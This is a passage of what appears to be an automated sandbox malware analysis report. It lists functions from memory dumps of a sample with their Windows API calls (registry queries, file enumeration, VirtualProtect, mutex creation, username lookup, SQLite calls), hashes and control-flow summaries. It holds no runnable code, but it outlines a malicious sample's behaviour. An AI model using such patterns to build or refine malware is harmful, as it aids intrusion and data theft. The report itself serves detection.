                                                                                                                                            • API String ID: 3498533004-0
                                                                                                                                            • Opcode ID: 859217dde41dcb30779a14b9fb7b7b9015ff1d658c5c6c7034cbbbf0b056caf6
                                                                                                                                            • Instruction ID: 9808f60697e89b13c371d4143fad4aff3dee40cfebd6edfb7b7c7abbd05e4004
                                                                                                                                            • Opcode Fuzzy Hash: 859217dde41dcb30779a14b9fb7b7b9015ff1d658c5c6c7034cbbbf0b056caf6
                                                                                                                                            • Instruction Fuzzy Hash: 5E115EB0A00205EFEB225F74CD4AF597BEAFF04710F118160A941DA2D8DAB5EA108A51
                                                                                                                                            Function 07004CA3 Relevance: 3.0, APIs: 2, Instructions: 49registryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 93 7004ca3-7004cdf RegOpenKeyExW 94 7004ce1-7004d01 RegQueryValueExW 93->94 95 7004d1f-7004d25 93->95 94->95 96 7004d03-7004d1a 94->96 96->95
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,00000000), ref: 07004CDA
                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400), ref: 07004CFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4153817207-0
                                                                                                                                            • Opcode ID: e4adee487aaa3c601ed37b4b87a4afeb8fab0f6c0346f2158064b813577d58cc
                                                                                                                                            • Instruction ID: 257a74dd0276a5b9f206fedbcbb0f5565dfb71dd555cd9efe57c5fb9154ba1c4
                                                                                                                                            • Opcode Fuzzy Hash: e4adee487aaa3c601ed37b4b87a4afeb8fab0f6c0346f2158064b813577d58cc
                                                                                                                                            • Instruction Fuzzy Hash: BE015E76A00214BFDB219FA5DC09DDA7FFAEF853A0F108165FA0197214D6359A148BD0
                                                                                                                                            Function 07002600 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2066263336-0
                                                                                                                                            • Opcode ID: fdec15112455a40820e8c58a1314eb4cd7bbe7e14e1ce25f0505afa6a64d8ff1
                                                                                                                                            • Instruction ID: 857b5770769bc266c9f66974230bcbd2bb08d72b97fdbf925ef538c93592d674
                                                                                                                                            • Opcode Fuzzy Hash: fdec15112455a40820e8c58a1314eb4cd7bbe7e14e1ce25f0505afa6a64d8ff1
                                                                                                                                            • Instruction Fuzzy Hash: DB01A2F6504103AFDB226B349C4DA9A7EA4FB06375F050691F14AD1292DF3985708BA1
                                                                                                                                            Function 07002613 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2066263336-0
                                                                                                                                            • Opcode ID: 18ab1dbc80cdb396625353da94616fb68cbe1f2031409f4590c68c9b3fd282b0
                                                                                                                                            • Instruction ID: 64aa9f86ac1cf6e68caf50437448d5f1a04d496337b020d7391166d6dc917870
                                                                                                                                            • Opcode Fuzzy Hash: 18ab1dbc80cdb396625353da94616fb68cbe1f2031409f4590c68c9b3fd282b0
                                                                                                                                            • Instruction Fuzzy Hash: FCF06DB2600006AFDB225F38DC4DE9A3FE8FB46365F0105A1F20AD1151DB3989709BA4
                                                                                                                                            Function 07002196 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 98 7002196-70021a0 99 70021a2-70021a6 98->99 100 70021de-70021e0 98->100 99->100 101 70021a8-70021cf UnmapViewOfFile CloseHandle 99->101 102 70021d4-70021d8 101->102 102->100
                                                                                                                                            APIs
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?), ref: 070021AB
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 070021C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFileHandleUnmapView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2381555830-0
                                                                                                                                            • Opcode ID: 69417114a12d4ead7cccfedd271c8a4a8e5c053cba8040213d04b2aaa64a3e93
                                                                                                                                            • Instruction ID: 6a57bd05ec9e461e40442d0514bd09b3444ddf7863a80d272bfa86566510a83b
                                                                                                                                            • Opcode Fuzzy Hash: 69417114a12d4ead7cccfedd271c8a4a8e5c053cba8040213d04b2aaa64a3e93
                                                                                                                                            • Instruction Fuzzy Hash: 27F0A070200200EFDB215F64CCCDF447BE6FF19311F058160EA018EAA9DB7AD890CEA1
                                                                                                                                            Function 07001DEE Relevance: 3.0, APIs: 2, Instructions: 16libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 07001E00
                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 07001E16
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4133054770-0
                                                                                                                                            • Opcode ID: bdc9db800f7457971a4cb47e88f15896cf467ac6ddb2660abfb43702325dc813
                                                                                                                                            • Instruction ID: 4292782ee5236f6092678a4b4ea3e8259ee5f9ff2ddbf35dadc32caee75ad7a3
                                                                                                                                            • Opcode Fuzzy Hash: bdc9db800f7457971a4cb47e88f15896cf467ac6ddb2660abfb43702325dc813
                                                                                                                                            • Instruction Fuzzy Hash: 1FD05E34A0030AAFDB218F34D809C1E3FEAFF453A9F018175B841C7719DE3AE9208A80
                                                                                                                                            Function 07004DF8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 116 7004df8-7004e66 call 7004e57 120 7004ec5-7004ed1 116->120 121 7004e68-7004e70 116->121 121->120 123 7004e72-7004e79 call 7004d26 121->123 123->120 126 7004e7b-7004eac call 7004c14 VirtualProtect call 7004a59 123->126 126->120 131 7004eae-7004ebb call 700279f call 7002c61 126->131 135 7004ec0-7004ec4 131->135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: e4652fded86e6adae3f35a117ebbf3ed0282c01c4b29963e6a47893e39b53850
                                                                                                                                            • Instruction ID: fadd2c334a6813bce71175e0978272beea91ea4e00f945858063bc55530a6d1d
                                                                                                                                            • Opcode Fuzzy Hash: e4652fded86e6adae3f35a117ebbf3ed0282c01c4b29963e6a47893e39b53850
                                                                                                                                            • Instruction Fuzzy Hash: 2E1181F1500395ABFB10ABA08C89FEF77B8AF01764F004655F6006A1C5D7B4E25587E9
                                                                                                                                            Function 07004E57 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 136 7004e57-7004e66 138 7004ec5-7004ed1 136->138 139 7004e68-7004e70 136->139 139->138 141 7004e72-7004e79 call 7004d26 139->141 141->138 144 7004e7b-7004eac call 7004c14 VirtualProtect call 7004a59 141->144 144->138 149 7004eae-7004ec4 call 700279f call 7002c61 144->149
                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(07001120,00003939,00000040,?), ref: 07004EA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: 8f4fb6054a2c8c138d2226a736fc9a64ec46a0251527cf4f42ef7614769928d0
                                                                                                                                            • Instruction ID: d50483087ab37230a7225d39757434d6490ea0515efff2566991c5943957ae2a
                                                                                                                                            • Opcode Fuzzy Hash: 8f4fb6054a2c8c138d2226a736fc9a64ec46a0251527cf4f42ef7614769928d0
                                                                                                                                            • Instruction Fuzzy Hash: 110162F1600356AEF710ABB48D85FEF23A9AF45765F004711B7009A1C4DAB4E50146E5
                                                                                                                                            Function 07001000 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(00000000,07006028,07006028,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 07001058
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 326d33d4fe567c4ee37aedd430c8ce1c66cee96bd095d3c8ed72511f5beca70d
                                                                                                                                            • Instruction ID: 7708f8f6e389550fca1d9837e488f03c923586984dfaede3114fcb2497580f86
                                                                                                                                            • Opcode Fuzzy Hash: 326d33d4fe567c4ee37aedd430c8ce1c66cee96bd095d3c8ed72511f5beca70d
                                                                                                                                            • Instruction Fuzzy Hash: 57F01C752C0605EBE7601B40EC1BF463AE2FB09732F028314F615D80D0CABE50749BC5
                                                                                                                                            Function 07003161 Relevance: 1.5, APIs: 1, Instructions: 27synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?), ref: 070031AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: ea62bc9f67203216ddf277cd4229ce3317335629c4f8318c7608a948f3e45a12
                                                                                                                                            • Instruction ID: fd03893b3fd632033e29702c4899d578fd5279aeb1bfc82a12f470e803a11b86
                                                                                                                                            • Opcode Fuzzy Hash: ea62bc9f67203216ddf277cd4229ce3317335629c4f8318c7608a948f3e45a12
                                                                                                                                            • Instruction Fuzzy Hash: A5E01BF55051119FFB121F70DC09BDABBD4EF05271F054614E506D5190DF3DC51086D5
                                                                                                                                            Function 07002768 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 154 7002768-700279e SetErrorMode
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0700279A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction ID: 699a024e0a5c613f804c23b7aadae925edf8aa6ef2238e220b035148e43530c8
                                                                                                                                            • Opcode Fuzzy Hash: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction Fuzzy Hash: 84E0ECB1D01308EFDB51DFA4D60978DB7F1BB10318F6181A4C44163244EB79AF08AB41
                                                                                                                                            Function 07002768 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0700279A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction ID: 699a024e0a5c613f804c23b7aadae925edf8aa6ef2238e220b035148e43530c8
                                                                                                                                            • Opcode Fuzzy Hash: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction Fuzzy Hash: 84E0ECB1D01308EFDB51DFA4D60978DB7F1BB10318F6181A4C44163244EB79AF08AB41
                                                                                                                                            Function 07003507 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 07003539
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: 482da8c995a4f74d02ecc4b3aceeacf32f7d25aa07a4e6a1e4d0a05bffc6e07f
                                                                                                                                            • Instruction ID: 1f33008c8bf41afde646084074871675b8ea1baf774dc2724effeb485a5af6f5
                                                                                                                                            • Opcode Fuzzy Hash: 482da8c995a4f74d02ecc4b3aceeacf32f7d25aa07a4e6a1e4d0a05bffc6e07f
                                                                                                                                            • Instruction Fuzzy Hash: EBD092B200010AEBDF025F54EC8A8DE3E6AFB0A395F115505F90654021D77BC571ABA1
                                                                                                                                            Function 07003199 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?), ref: 070031AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: 448c5d0f5f0344c08cb0f611ebd8f33d755b618d42bf3010e55dd722cc54bf3d
                                                                                                                                            • Instruction ID: ca6d4aa422b7dc9f5185f62696ddfbf57a39a770fb1c82f4672e809bb94d1ce7
                                                                                                                                            • Opcode Fuzzy Hash: 448c5d0f5f0344c08cb0f611ebd8f33d755b618d42bf3010e55dd722cc54bf3d
                                                                                                                                            • Instruction Fuzzy Hash: 28D0C972604115ABDF126F94AC49A8A7FE5EF153A5B004525E50588151EB3A82308BD0
                                                                                                                                            Function 07001EE6 Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 07001EFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 5c0b6406230129fe6de1bdb2932368622c490ba868e862f5fe96a86c99ba5a7e
                                                                                                                                            • Instruction ID: 077e9be4a8c3806ddc56d2593dec91f432b289fdf0e99c17d710720efc5b52d9
                                                                                                                                            • Opcode Fuzzy Hash: 5c0b6406230129fe6de1bdb2932368622c490ba868e862f5fe96a86c99ba5a7e
                                                                                                                                            • Instruction Fuzzy Hash: 0FD01235540208BBEB11EB949C07F897B75A748B14F508110B705580D096B4A628DBD5
                                                                                                                                            Function 070021FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 155 70021ff-700221a GetUserNameA
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(00000400,00000400), ref: 07002213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            • Opcode ID: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction ID: 296470ea2d1905e73cca287aa37e26fdfe67e2562d18cc4f69aa6f6bc27716d3
                                                                                                                                            • Opcode Fuzzy Hash: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction Fuzzy Hash: 52C08CB040020DFBDF00EF90E90A89D7BB8AB80348F0081A4E60166044DBB8AB0ADBD1
                                                                                                                                            Function 07002196 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                            • Opcode ID: 7fad6343f9c2b2dde39e438d04a6b4d056a53cf9e638bfff8e61592f861bcdc1
                                                                                                                                            • Instruction ID: 6a57bd05ec9e461e40442d0514bd09b3444ddf7863a80d272bfa86566510a83b
                                                                                                                                            • Opcode Fuzzy Hash: 7fad6343f9c2b2dde39e438d04a6b4d056a53cf9e638bfff8e61592f861bcdc1
                                                                                                                                            • Instruction Fuzzy Hash: 27F0A070200200EFDB215F64CCCDF447BE6FF19311F058160EA018EAA9DB7AD890CEA1

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 61E23C36 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E23C8B
                                                                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 61E23CAB
                                                                                                                                            • sqlite3_value_blob.SQLITE3 ref: 61E23CB8
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23CCF
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E23D1F
                                                                                                                                            • sqlite3_result_text64.SQLITE3 ref: 61E23E6F
                                                                                                                                            • sqlite3_result_blob64.SQLITE3 ref: 61E23EC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3992148849-0
                                                                                                                                            • Opcode ID: 2f9c04d0618c17e054d48f8f02be8033d10990f51b201c2530825f44b93309a4
                                                                                                                                            • Instruction ID: 8bf96a2d00f04e2aca3490bfbb0228dba3e221c05c0191d79004e04b9226a1a3
                                                                                                                                            • Opcode Fuzzy Hash: 2f9c04d0618c17e054d48f8f02be8033d10990f51b201c2530825f44b93309a4
                                                                                                                                            • Instruction Fuzzy Hash: AB918275E047198FDB01CFA9C8A069DBBB1BB8D324F29C62AE86497394D730D8468F51
                                                                                                                                            Function 61E1CE5B Relevance: 7.8, APIs: 5, Instructions: 340COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
